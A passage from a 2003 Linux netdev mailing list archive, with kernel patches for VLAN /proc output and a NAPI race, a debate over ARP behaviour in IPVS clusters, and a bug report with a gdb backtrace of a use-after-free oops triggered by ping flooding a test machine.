kfree(page); - return -EFAULT; - } + if (*pos == 0) + return SEQ_START_TOKEN; + + for (dev = vlan_skip(dev_base); dev && i < *pos; + dev = vlan_skip(dev->next), ++i); + + return (i == *pos) ? dev : NULL; +} - file->f_pos += len; - } else { - len = 0; - } +static void *vlan_seq_next(struct seq_file *seq, void *v, loff_t *pos) +{ + ++*pos; - kfree(page); - VLAN_FMEM_DBG("page free, addr: %p\n", page); - return len; + return vlan_skip((v == SEQ_START_TOKEN) + ? dev_base + : ((struct net_device *)v)->next); } -/* - * The following few functions build the content of /proc/net/vlan/config - */ +static void vlan_seq_stop(struct seq_file *seq, void *v) +{ + read_unlock(&dev_base_lock); +} -static int vlan_proc_get_vlan_info(char* buf, unsigned int cnt) +static int vlan_seq_show(struct seq_file *seq, void *v) { - struct net_device *vlandev = NULL; - struct vlan_group *grp = NULL; - int h, i; - char *nm_type = NULL; - struct vlan_dev_info *dev_info = NULL; + if (v == SEQ_START_TOKEN) { + const char *nmtype = NULL; -#ifdef VLAN_DEBUG - printk(VLAN_DBG __FUNCTION__ ": cnt == %i\n", cnt); -#endif + seq_puts(seq, "VLAN Dev name | VLAN ID\n"); - if (vlan_name_type == VLAN_NAME_TYPE_RAW_PLUS_VID) { - nm_type = "VLAN_NAME_TYPE_RAW_PLUS_VID"; - } else if (vlan_name_type == VLAN_NAME_TYPE_PLUS_VID_NO_PAD) { - nm_type = "VLAN_NAME_TYPE_PLUS_VID_NO_PAD"; - } else if (vlan_name_type == VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD) { - nm_type = "VLAN_NAME_TYPE_RAW_PLUS_VID_NO_PAD"; - } else if (vlan_name_type == VLAN_NAME_TYPE_PLUS_VID) { - nm_type = "VLAN_NAME_TYPE_PLUS_VID"; - } else { - nm_type = "UNKNOWN"; - } + if (vlan_name_type < ARRAY_SIZE(vlan_name_type_str)) + nmtype = vlan_name_type_str[vlan_name_type]; - cnt += sprintf(buf + cnt, "Name-Type: %s\n", nm_type); + seq_printf(seq, "Name-Type: %s\n", + nmtype ? 
nmtype : "UNKNOWN" ); + } else { + const struct net_device *vlandev = v; + const struct vlan_dev_info *dev_info = VLAN_DEV_INFO(vlandev); - spin_lock_bh(&vlan_group_lock); - for (h = 0; h < VLAN_GRP_HASH_SIZE; h++) { - for (grp = vlan_group_hash[h]; grp != NULL; grp = grp->next) { - for (i = 0; i < VLAN_GROUP_ARRAY_LEN; i++) { - vlandev = grp->vlan_devices[i]; - if (!vlandev) - continue; - - if ((cnt + 100) > VLAN_PROC_BUFSZ) { - if ((cnt+strlen(term_msg)) < VLAN_PROC_BUFSZ) - cnt += sprintf(buf+cnt, "%s", term_msg); - - goto out; - } - - dev_info = VLAN_DEV_INFO(vlandev); - cnt += sprintf(buf + cnt, "%-15s| %d | %s\n", - vlandev->name, - dev_info->vlan_id, - dev_info->real_dev->name); - } - } + seq_printf(seq, "%-15s| %d | %s\n", vlandev->name, + dev_info->vlan_id, dev_info->real_dev->name); } -out: - spin_unlock_bh(&vlan_group_lock); - - return cnt; + return 0; } -/* - * Prepare data for reading 'Config' entry. - * Return length of data. - */ - -static int vlan_config_get_info(char *buf, char **start, - off_t offs, int len) +static int vlandev_seq_show(struct seq_file *seq, void *offset) { - strcpy(buf, conf_hdr); - return vlan_proc_get_vlan_info(buf, (unsigned int)(strlen(conf_hdr))); -} - -/* - * Prepare data for reading entry. - * Return length of data. - * - * On entry, the 'start' argument will contain a pointer to VLAN device - * data space. 
- */ - -static int vlandev_get_info(char *buf, char **start, - off_t offs, int len) -{ - struct net_device *vlandev = (void *) start; - struct net_device_stats *stats = NULL; - struct vlan_dev_info *dev_info = NULL; - struct vlan_priority_tci_mapping *mp; - int cnt = 0; + struct net_device *vlandev = (struct net_device *) seq->private; + const struct vlan_dev_info *dev_info = VLAN_DEV_INFO(vlandev); + struct net_device_stats *stats; + static const char *fmt = "%30s %12lu\n"; int i; if ((vlandev == NULL) || (!(vlandev->priv_flags & IFF_802_1Q_VLAN))) return 0; - dev_info = VLAN_DEV_INFO(vlandev); - - cnt += sprintf(buf + cnt, "%s VID: %d REORDER_HDR: %i dev->priv_flags: %hx\n", + seq_printf(seq, "%s VID: %d REORDER_HDR: %i dev->priv_flags: %hx\n", vlandev->name, dev_info->vlan_id, (int)(dev_info->flags & 1), vlandev->priv_flags); - stats = vlan_dev_get_stats(vlandev); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total frames received", stats->rx_packets); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total bytes received", stats->rx_bytes); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "Broadcast/Multicast Rcvd", stats->multicast); - - cnt += sprintf(buf + cnt, "\n%30s: %12lu\n", - "total frames transmitted", stats->tx_packets); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total bytes transmitted", stats->tx_bytes); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total headroom inc", dev_info->cnt_inc_headroom_on_tx); - - cnt += sprintf(buf + cnt, "%30s: %12lu\n", - "total encap on xmit", dev_info->cnt_encap_on_xmit); - cnt += sprintf(buf + cnt, "Device: %s", dev_info->real_dev->name); + stats = vlan_dev_get_stats(vlandev); + seq_printf(seq, fmt, "total frames received", stats->rx_packets); + seq_printf(seq, fmt, "total bytes received", stats->rx_bytes); + seq_printf(seq, fmt, "Broadcast/Multicast Rcvd", stats->multicast); + seq_puts(seq, "\n"); + seq_printf(seq, fmt, "total frames transmitted", stats->tx_packets); + seq_printf(seq, fmt, "total 
bytes transmitted", stats->tx_bytes); + seq_printf(seq, fmt, "total headroom inc", + dev_info->cnt_inc_headroom_on_tx); + seq_printf(seq, fmt, "total encap on xmit", + dev_info->cnt_encap_on_xmit); + seq_printf(seq, "Device: %s", dev_info->real_dev->name); /* now show all PRIORITY mappings relating to this VLAN */ - cnt += sprintf(buf + cnt, "\nINGRESS priority mappings: 0:%lu 1:%lu 2:%lu 3:%lu 4:%lu 5:%lu 6:%lu 7:%lu\n", + seq_printf(seq, + "\nINGRESS priority mappings: 0:%lu 1:%lu 2:%lu 3:%lu 4:%lu 5:%lu 6:%lu 7:%lu\n", dev_info->ingress_priority_map[0], dev_info->ingress_priority_map[1], dev_info->ingress_priority_map[2], @@ -389,38 +332,17 @@ dev_info->ingress_priority_map[6], dev_info->ingress_priority_map[7]); - if ((cnt + 100) > VLAN_PROC_BUFSZ) { - if ((cnt + strlen(term_msg)) >= VLAN_PROC_BUFSZ) { - /* should never get here */ - return cnt; - } else { - cnt += sprintf(buf + cnt, "%s", term_msg); - return cnt; - } - } - - cnt += sprintf(buf + cnt, "EGRESSS priority Mappings: "); - + seq_printf(seq, "EGRESSS priority Mappings: "); for (i = 0; i < 16; i++) { - mp = dev_info->egress_priority_map[i]; + const struct vlan_priority_tci_mapping *mp + = dev_info->egress_priority_map[i]; while (mp) { - cnt += sprintf(buf + cnt, "%lu:%hu ", - mp->priority, ((mp->vlan_qos >> 13) & 0x7)); - - if ((cnt + 100) > VLAN_PROC_BUFSZ) { - if ((cnt + strlen(term_msg)) >= VLAN_PROC_BUFSZ) { - /* should never get here */ - return cnt; - } else { - cnt += sprintf(buf + cnt, "%s", term_msg); - return cnt; - } - } + seq_printf(seq, "%lu:%hu ", + mp->priority, ((mp->vlan_qos >> 13) & 0x7)); mp = mp->next; } } + seq_puts(seq, "\n"); - cnt += sprintf(buf + cnt, "\n"); - - return cnt; + return 0; } diff -Nru a/net/8021q/vlanproc.h b/net/8021q/vlanproc.h --- a/net/8021q/vlanproc.h Mon Jul 28 15:28:36 2003 +++ b/net/8021q/vlanproc.h Mon Jul 28 15:28:36 2003 @@ -3,12 +3,9 @@ #ifdef CONFIG_PROC_FS int vlan_proc_init(void); - void vlan_proc_rem_dev(struct net_device *vlandev); int 
vlan_proc_add_dev (struct net_device *vlandev); void vlan_proc_cleanup (void); - -#define VLAN_PROC_BUFSZ (4096) /* buffer size for printing proc info */ #else /* No CONFIG_PROC_FS */ From ja@ssi.bg Mon Jul 28 15:36:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 15:36:37 -0700 (PDT) Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SMaPFl030152 for ; Mon, 28 Jul 2003 15:36:28 -0700 Received: from localhost (IDENT:ja@localhost [127.0.0.1]) by u.domain.uli (8.11.6/8.11.6) with ESMTP id h6SMaWk01918; Tue, 29 Jul 2003 01:36:32 +0300 Date: Tue, 29 Jul 2003 01:36:32 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@u.domain.uli To: "David S. Miller" cc: netdev@oss.sgi.com, , Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-Reply-To: <20030727183547.784b6ab5.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4354 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Sun, 27 Jul 2003, David S. Miller wrote: > It would be really nice if people might consider that it could even be > possible to make things like the IPVS layer install the appropriate > NETFILTER_ARP chain rules when the IPVS configuration installed dictates > that one is needed. This is not a kernel job > People using IPVS wouldn't even need to do _ANYTHING_ if IPVS were > to do that. Only if IPVS runs on these boxes, not always true. > And all of that would be _FINE_ because like ARP netfilter, IPVS lies > inside of netfilter where such things which change networking behavior > semantics radically belong. This is good assumption but as usually the world is not perfect. First, the shared IPs should be used only for IPVS talks. 
With so many places in the kernel calling inet_select_addr(), I do not think "hidden" should be blamed for adding explicit checks to the IP layer. This is a better-safe-than-sorry situation. Thank Alexey for the added checks.

Second, arp_filter is useless for filtering our announcements and thus for IPVS setups. Also, ARP has never used preferred source addresses. I have a patch for this but I consider it incorrect. So prefsrc does not come into play here either. The prefsrc is used only by the IP layer when originating connections demand autobind. It is not used for incoming connections. With rp_filter=0 and arp_filter=1, ARP can easily announce local IPs on the wrong interface. arp_filter cannot stop that.

So, for IPVS setups the only valid solutions are:

- hidden (patch)
- arptables (needs recent kernels and/or patch)
- iparp (patch)

We have only patches. I assume things will change only when people see that arptables is working. Then they will need time to adapt their clusters to the new tools. I hope that will happen in 2.6 and we will stop talking about hidden. BTW, would you consider iparp for kernel inclusion? I know it is duplicated work, just asking: http://www.ssi.bg/~ja/#iparp

Some rules (in response to other posts):

- the shared IPs have ARP requirements (obvious to everyone)
- the shared IPs have IP requirements (autobinding to shared IPs and their ports should be prohibited, with rules or with policy as in the case with "hidden"). Even explicit binding to such IPs can be prohibited. Do we need iptables hooks for denying autobind for some IPs?

As for ARP and the RFCs, the RFCs are free enough to allow ip-to-hwaddr lookups and announcements. All the other requirements we have can be solved with ARP filters:

- dropping incoming probes
- fixing our announcements (e.g. one IP announced only through a specific interface)
- proxy arp answering
- deciding what to put in the ARP cache

Dropping probes, fixing announcements, all of it is part of the game.
We should be able to do everything on our LAN as long as the upper layers are happy with the ARP service and there is sane and well defined behavior. There are defaults for usual setups known to the RFC authors and there are knobs to make Linux more powerful. Regards -- Julian Anastasov From davem@redhat.com Mon Jul 28 16:30:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 16:30:36 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SNUIFl001095 for ; Mon, 28 Jul 2003 16:30:21 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA30636; Mon, 28 Jul 2003 16:27:07 -0700 Date: Mon, 28 Jul 2003 16:27:07 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: greearb@candelatech.com, vlan@wanfear.com, netdev@oss.sgi.com Subject: Re: [PATCH] typo in vlan debug code Message-Id: <20030728162707.1ca4e321.davem@redhat.com> In-Reply-To: <20030728151745.54123f45.shemminger@osdl.org> References: <20030728151745.54123f45.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4355 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 15:17:45 -0700 Stephen Hemminger wrote: > VLAN won't build with debug enabled. Applied to both 2.4.x and 2.5.x, thanks Stephen. 
From davem@redhat.com Mon Jul 28 16:31:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 16:31:40 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SNVaFl001352 for ; Mon, 28 Jul 2003 16:31:36 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA30653; Mon, 28 Jul 2003 16:28:24 -0700 Date: Mon, 28 Jul 2003 16:28:24 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: greearb@candelatech.com, vlan@wanfear.com, netdev@oss.sgi.com Subject: Re: [PATCH] Vlan convert stubs to no-ops Message-Id: <20030728162824.47f16322.davem@redhat.com> In-Reply-To: <20030728152114.02a10f4e.shemminger@osdl.org> References: <20030728152114.02a10f4e.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4356 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 15:21:14 -0700 Stephen Hemminger wrote: > When building without /proc, the interfaces can be converted to no-ops > (very minor code savings). Applied to 2.6.x, thanks Stephen. From davem@redhat.com Mon Jul 28 16:34:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 16:34:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SNYBFl001906 for ; Mon, 28 Jul 2003 16:34:12 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA30684; Mon, 28 Jul 2003 16:31:00 -0700 Date: Mon, 28 Jul 2003 16:31:00 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: greearb@candelatech.com, vlan@wanfear.com, netdev@oss.sgi.com Subject: Re: [PATCH] convert VLAN to use seq_file for /proc Message-Id: <20030728163100.7b47ed5e.davem@redhat.com> In-Reply-To: <20030728153024.6b1d7cde.shemminger@osdl.org> References: <20030728153024.6b1d7cde.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4357 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 15:30:24 -0700 Stephen Hemminger wrote: > Use seq_file interface for smaller, simpler, safer code in /proc. > Output format is the same. > > Patch for 2.6.0-test2 with earlier proc patches Applied to 2.6.x, thanks Stephen. From davidsen@tmr.com Mon Jul 28 19:59:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 19:59:20 -0700 (PDT) Received: from gatekeeper.tmr.com (tmr-02.dsl.thebiz.net [216.238.38.204]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T2xDFl015643 for ; Mon, 28 Jul 2003 19:59:14 -0700 Received: from localhost (davidsen@localhost) by gatekeeper.tmr.com (8.9.0/8.9.0) with SMTP id WAA21198; Mon, 28 Jul 2003 22:51:00 -0400 Date: Mon, 28 Jul 2003 22:51:00 -0400 (EDT) From: Bill Davidsen To: "David S. 
Miller" cc: Carlos Velasco , bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-Reply-To: <20030727164649.517b2b88.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4358 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidsen@tmr.com Precedence: bulk X-list: netdev On Sun, 27 Jul 2003, David S. Miller wrote: > On Mon, 28 Jul 2003 01:40:47 +0200 > "Carlos Velasco" wrote: > > > I stepped into the same problems you have reported here. > > No, your problem was completely different. > > > There's a feature to do linux to behave like other OS and systems, called "hidden". > > WRONG! People please stop this misinformation already. > > Bas's problem can be solved by him giving a "preferred source" > to each of his IPV4 routes and setting the "arpfilter" sysctl > variable for his devices to "1". You say this with total disregard for the fact that in actual practice it only works for static routes. If you get a new connection it does not by magic make an entry in the route table to go back out of the NIC with the matching source IP, doing a "solution" with routing needs a route for every destination (host or CIDR block). Doing a "solution" with source routing works if you have a small number of source IPs. However the number of routes is limited (252??) and again the convenience factor of having the right information added with the route addition is "do it by hand or write your own software." > > This particular case has been discussed to death in the past > and I really recommend people read up there before dragging this > out further. It will keep coming back because it's a real problem. 
I do agree that the hidden patch is not the desired way to solve the problem, but until there is a reasonable (not requiring a guru or large manual effort) solution people will keep bringing it up.

You have stated that this is required by some RFC. I can see that the RFC *allows* this behaviour, but I think there are a very small number of people who believe that current 2.6 behaviour is better than doing what most of the other o/s vendors have done. Feel free to quote the RFC saying it must be done the way it is and at least some of us will stop mentioning the problem.

I believe you were the one who said that my "require source IP on NIC" patch (2.4.16) was non-compliant, but I don't quite see that either. It didn't prevent accepting a packet on one NIC which matched an address on another, but it did prevent packets from going out if the source address was not on the NIC. The incoming case seems to be a minor problem, since there should *be* no incoming packets if arp-filter is on. It didn't have a /proc interface, either, but that's a nit-pick; it could be added.

I would hope that you would either quote the RFC other vendors are violating, or stop repeating "the hidden patch is bad" and start saying "here is another convenient solution." As in one which can be set in a single place and which will send packets out of a NIC with the matching source address, similar to the behaviour of other implementations.

--
bill davidsen
  CTO, TMR Associates, Inc
Doing interesting things with little computers since 1979.
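
[Editorial sketch] The route-based setup quoted at the top of the message above (a preferred source on each IPv4 route plus the arp_filter sysctl) might look roughly like the fragment below. The interface names, addresses, gateways and table numbers are all hypothetical (documentation address ranges). The `ip rule` lines are an assumption added here to show one common way of sending replies out of the NIC that owns the source address; they are not taken from the thread.

```shell
# Hypothetical two-NIC host (all names and addresses are made up):
#   eth0 = 192.0.2.10/24, gateway 192.0.2.1
#   eth1 = 198.51.100.10/24, gateway 198.51.100.1

# Answer ARP on an interface only if the kernel would route a packet
# from the requested IP out of that interface.
sysctl -w net.ipv4.conf.eth0.arp_filter=1
sysctl -w net.ipv4.conf.eth1.arp_filter=1

# Give each connected route an explicit preferred source address.
ip route replace 192.0.2.0/24 dev eth0 src 192.0.2.10
ip route replace 198.51.100.0/24 dev eth1 src 198.51.100.10

# Assumption: source-based policy routing, one table per local address,
# so that traffic sourced from an address leaves through its own NIC.
ip route add default via 192.0.2.1 dev eth0 table 101
ip rule add from 192.0.2.10 table 101
ip route add default via 198.51.100.1 dev eth1 table 102
ip rule add from 198.51.100.10 table 102
```

Note that this needs one rule and one table per source address, maintained by hand or by local scripts, which is the kind of manual effort the message above objects to.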
From akpm@osdl.org Mon Jul 28 20:46:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 20:46:19 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T3k9Fl016387 for ; Mon, 28 Jul 2003 20:46:09 -0700 Received: from mnm (build.pdx.osdl.net [172.20.1.2]) by mail.osdl.org (8.11.6/8.11.6) with ESMTP id h6T3k0I05170; Mon, 28 Jul 2003 20:46:00 -0700 Date: Mon, 28 Jul 2003 20:46:15 -0700 From: Andrew Morton To: Burton Windle Cc: netdev@oss.sgi.com Subject: Re: [Bugme-new] [Bug 937] New: Oops in raw_rcv_skb while ping flooding Message-Id: <20030728204615.7c92d413.akpm@osdl.org> In-Reply-To: References: <20030727202514.5b4b2ba9.akpm@osdl.org> X-Mailer: Sylpheed version 0.9.4 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4359 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@osdl.org Precedence: bulk X-list: netdev Burton Windle wrote: > > Still happens with 2.6.0-test2. > > CONFIG_DEBUG_KERNEL=y > CONFIG_DEBUG_STACKOVERFLOW=y > CONFIG_DEBUG_SLAB=y > CONFIG_DEBUG_IOVIRT=y > CONFIG_MAGIC_SYSRQ=y > CONFIG_DEBUG_SPINLOCK=y > CONFIG_DEBUG_PAGEALLOC=y > CONFIG_DEBUG_SPINLOCK_SLEEP=y > CONFIG_FRAME_POINTER=y yeah, me too. The sending machine is a 4-way x86. I run ping -f otherhost & ping -f otherhost & and it oopses immediately: Program received signal SIGEMT, Emulation trap. 
0xc036f40d in raw_rcv_skb (sk=0xf57cc004, skb=0xf3772004) at include/net/sock.h:942 942 sk->sk_data_ready(sk, skb->len); (gdb) p skb->len Cannot access memory at address 0xf3772068 (gdb) bt #0 0xc036f40d in raw_rcv_skb (sk=0xf57cc004, skb=0xf3772004) at include/net/sock.h:942 #1 0xc036f515 in raw_rcv (sk=0xf57cc004, skb=0xf3772004) at net/ipv4/raw.c:255 #2 0xc036f0bc in raw_v4_input (skb=0xf377b004, iph=0xf6a99024, hash=0) at net/ipv4/raw.c:169 #3 0xc034d9b9 in ip_local_deliver_finish (skb=0xf377b004) at net/ipv4/ip_input.c:234 #4 0xc0344968 in nf_hook_slow (pf=2, hook=1, skb=0xf377b004, indev=0xf70b7004, outdev=0x0, okfn=0xc034d914 , hook_thresh=-2147483648) at net/core/netfilter.c:539 #5 0xc034d48a in ip_local_deliver (skb=0xf377b004) at net/ipv4/ip_input.c:285 #6 0xc034dcee in ip_rcv_finish (skb=0xf377b004) at net/ipv4/ip_input.c:349 #7 0xc0344968 in nf_hook_slow (pf=2, hook=0, skb=0xf377b004, indev=0xf70b7004, outdev=0x0, okfn=0xc034daf4 , hook_thresh=-2147483648) at net/core/netfilter.c:539 #8 0xc034d8c0 in ip_rcv (skb=0xf377b004, dev=0x0, pt=0xc04afd60) at net/ipv4/ip_input.c:424 #9 0xc033c19b in netif_receive_skb (skb=0xf377b004) at net/core/dev.c:1596 #10 0xc033c27f in process_backlog (backlog_dev=0xc3857a50, budget=0xc05bbf40) at net/core/dev.c:1630 #11 0xc033c3be in net_rx_action (h=0xc05b7d98) at net/core/dev.c:1695 #12 0xc01289cb in do_softirq () at kernel/softirq.c:100 #13 0xc010d516 in do_IRQ (regs= {ebx = -1067737088, ecx = -1067737088, edx = -1067737088, esi = -1072657448, edi = -1072672768, ebp = -1067728960, eax = 16, xds = -1072693125, xes = 123, orig_eax = -218, eip = -1072657404, xcs = 96, eflags = 582, esp = -1067728944, xss = -1072657306}) at arch/i386/kernel/irq.c:500 #14 0xc010b8fc in common_interrupt () #15 0xc0108c66 in cpu_idle () at arch/i386/kernel/process.c:146 #16 0xc010507c in rest_init () at init/main.c:374 #17 0xc05bc7dc in start_kernel () at init/main.c:466 The critical thing here is CONFIG_DEBUG_PAGEALLOC (I have all debug 
options turned on). The memory at *skb has been freed and unmapped. Looks like a use-after-free bug. Now it _might_ be a bug in CONFIG_DEBUG_PAGEALLOC. I'm not sure that I'm 100% confident in it yet. But it hits so quickly that I rather doubt it. From lamont@scriptkiddie.org Mon Jul 28 21:48:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 21:49:02 -0700 (PDT) Received: from warez.scriptkiddie.org (uswest-dsl-142-38.cortland.com [209.162.142.38]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T4msFl017434 for ; Mon, 28 Jul 2003 21:48:55 -0700 Received: from [192.168.69.11] (unknown [192.168.69.11]) by warez.scriptkiddie.org (Postfix) with ESMTP id DF71462D1A; Mon, 28 Jul 2003 21:48:52 -0700 (PDT) Date: Mon, 28 Jul 2003 21:48:52 -0700 (PDT) From: Lamont Granquist To: Bill Davidsen Cc: "David S. Miller" , Carlos Velasco , bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-Reply-To: Message-ID: <20030728213933.F81299@coredump.scriptkiddie.org> References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4360 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lamont@scriptkiddie.org Precedence: bulk X-list: netdev On Mon, 28 Jul 2003, Bill Davidsen wrote: > On Sun, 27 Jul 2003, David S. Miller wrote: > > This particular case has been discussed to death in the past > > and I really recommend people read up there before dragging this > > out further. > > It will keep coming back because it's a real problem. I do agree that the > hidden patch is not the desired way to solve the problem, but until there > is a reasonable (not requiring a guru or large manual effort) solution > people will keep bringing it up. And it severely violates the principle of least surprise. 
It's unfortunate that this principle isn't more widely discussed and considered on lkml.

From anton@samba.org Mon Jul 28 23:05:46 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 23:05:50 -0700 (PDT)
Received: from lists.samba.org (dp.samba.org [66.70.73.150]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T65jFl020825 for ; Mon, 28 Jul 2003 23:05:45 -0700
Received: by lists.samba.org (Postfix, from userid 504) id 929C52C0C7; Tue, 29 Jul 2003 06:05:44 +0000 (GMT)
Date: Tue, 29 Jul 2003 16:05:09 +1000
From: Anton Blanchard
To: netdev@oss.sgi.com
Cc: miltonm@bga.com
Subject: [PATCH] fix NAPI race
Message-ID: <20030729060509.GB13227@krispykreme>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.4i
X-archive-position: 4361
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: anton@samba.org
Precedence: bulk
X-list: netdev

Hi,

Milton and I debugged an oops where we did list_del on a poisoned list entry. It turns out there is nothing to order between list_del on poll_list and the clear_bit that serialises list_add.

Anton diff -ruN --exclude-from=exclude gr13_work/include/linux/netdevice.h gr13_work_miltonm/include/linux/netdevice.h --- gr13_work/include/linux/netdevice.h 2003-07-17 23:30:43.000000000 -0500 +++ gr13_work_miltonm/include/linux/netdevice.h 2003-07-28 23:42:06.000000000 -0500 @@ -820,6 +820,7 @@ local_irq_save(flags); if (!test_bit(__LINK_STATE_RX_SCHED, &dev->state)) BUG(); list_del(&dev->poll_list); + smp_mb__before_clear_bit(); clear_bit(__LINK_STATE_RX_SCHED, &dev->state); local_irq_restore(flags); } diff -ruN --exclude-from=exclude gr13_work/net/core/dev.c gr13_work_miltonm/net/core/dev.c --- gr13_work/net/core/dev.c 2003-07-17 23:30:43.000000000 -0500 +++ gr13_work_miltonm/net/core/dev.c 2003-07-28 23:40:15.000000000 -0500 @@ -1657,6 +1657,7 @@ *budget -= work; list_del(&backlog_dev->poll_list); + smp_mb__before_clear_bit(); clear_bit(__LINK_STATE_RX_SCHED, &backlog_dev->state); if (queue->throttle) { diff -ruN --exclude-from=exclude gr13_work/drivers/net/tg3.c gr13_work_miltonm/drivers/net/tg3.c --- gr13_work/drivers/net/tg3.c 2003-07-13 23:40:19.000000000 -0500 +++ gr13_work_miltonm/drivers/net/tg3.c 2003-07-29 01:00:32.000000000 -0500 @@ -250,6 +250,7 @@ { if (!test_bit(__LINK_STATE_RX_SCHED, &dev->state)) BUG(); list_del(&dev->poll_list); + smp_mb__before_clear_bit(); clear_bit(__LINK_STATE_RX_SCHED, &dev->state); } From anton@samba.org Tue Jul 29 00:43:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 00:43:34 -0700 (PDT) Received: from lists.samba.org (dp.samba.org [66.70.73.150]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T7hEFl028851 for ; Tue, 29 Jul 2003 00:43:15 -0700 Received: by lists.samba.org (Postfix, from userid 504) id 33A9E2C07C; Tue, 29 Jul 2003 06:56:01 +0000 (GMT) Date: Tue, 29 Jul 2003 16:53:07 +1000 From: Anton Blanchard To: "David S. 
